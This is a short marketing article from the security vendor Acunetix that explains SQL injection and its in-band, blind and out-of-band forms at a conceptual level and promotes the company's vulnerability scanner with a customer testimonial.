There’s a reason injection vulnerabilities remain number one on the OWASP Top 10, SQL injection (SQLi) attacks continue to be the most prevalent form of web application attacks used by malicious hackers around the world.
An SQLi only needs two conditions to exist: a vulnerable user controllable input within your web application which is directly used in an SQL query, and an SQL based relational database. MySQL, Microsoft SQL Server, Oracle, and SQLite are all examples of popular relational database management systems (RDBMSs) in use today. Since many websites are based on content management systems like WordPress or Drupal, it’s not uncommon for a third-party theme or plugin to introduce an SQLi vulnerability. Let’s take a deep dive into the world of SQL injection attacks and how Acunetix can help you identify SQLi vulnerabilities in your web applications in order to fix them before attackers can exploit them.
What is SQL InjectionSQLi is a well documented vulnerability that’s been known to the developer community since the late 1990s. Whenever you type text into a form, like your login credentials, an SQL statement is created by the web application, containing your input value, and is sent to the DBMS to executes it. The communication between the client (such as a browser) and a web server is called an HTTP request. A typical SQLi attack involves an attacker entering malicious SQL statements in an HTTP request, allowing the hacker to change the behavior of the SQL statement that gets constructed by the web application. Fortunately, there are many testing tools available to the developer looking to find security vulnerabilities.
Types of SQL Injection TechniquesHackers have devised myriad ways to exploit SQL injection vulnerabilities. The three main types of SQL injection are:
- In-band SQLi (Classic SQLi) is the simplest SQL exploit which involves using traditional HTTP request/response communication channels(Error-based SQLi and Union-based SQLi).
- Blind SQLi (Inferential SQLi), the slow and steady approach involves sending payloads and monitoring the web application’s response times or contents to reconstruct the database structure.
- Out-of-band SQLi is the least common because it is rare. The attack requires getting an SQL injection payload to use features within the DMBS to exfiltrate data to a server controlled by the attacker. The advantage is it can be used when server responses are too unstable for a blind SQLi.
Test your Web App for SQL Injection with AcunetixThe best way to secure your digital assets from SQLi is to find and fix web application vulnerabilities before they can be exploited. Looking for a powerful scanner that can help you identify security vulnerabilities for your team to fix? Try Acunetix’s Vulnerability Scanner today to look for SQL injection, Cross-site Scripting (XSS), and other security vulnerabilities.
Learn more about prominent vulnerabilities, keep up with recent product updates, and catch the latest news from Acunetix.
“We use Acunetix as part of our Security in the SDLC and to test code in DEV and SIT before being promoted to Production.”Kurt Zanzi, Xerox CA-MMIS Information Securtiy Office, Xerox